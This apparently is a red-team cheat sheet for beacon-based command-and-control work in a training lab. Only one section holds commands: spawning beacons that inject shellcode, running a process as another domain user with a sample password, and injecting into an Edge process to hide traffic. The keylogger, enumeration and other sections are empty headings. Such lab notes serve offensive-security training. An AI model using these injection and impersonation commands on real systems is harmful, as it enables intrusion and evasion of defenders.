Enumeration

Session Passing

Spawn New Beacon

# Create new process and inject shellcode (ensure listener exists)
spawn x64 http
spawn x86 http

Spawn as Another User

cd C:\Windows\Temp
spawnas INLANEFREIGHT\tmorgan Passw0rd! tcp-local

Process Migration

Stay in processes that SHOULD have network connections.

# Spawn windowless process to inject into
execute C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

# Inject into the process
inject <pid> x64 http

Host Enumeration

File System

Software and Services

Drives

Keylogger

Clipboard and Screenshot

Registry

Job Management

Program Execution

Import and Run Scripts

Execute .NET Assembly

AV Enumeration

Local

Remote (via WinRM)

LDAP Enumeration

SIDs

Domain Users

NEVER RUN (objectClass=*)

BOFHound Compatible Queries

Group Membership (Recursive)

Bitwise Filters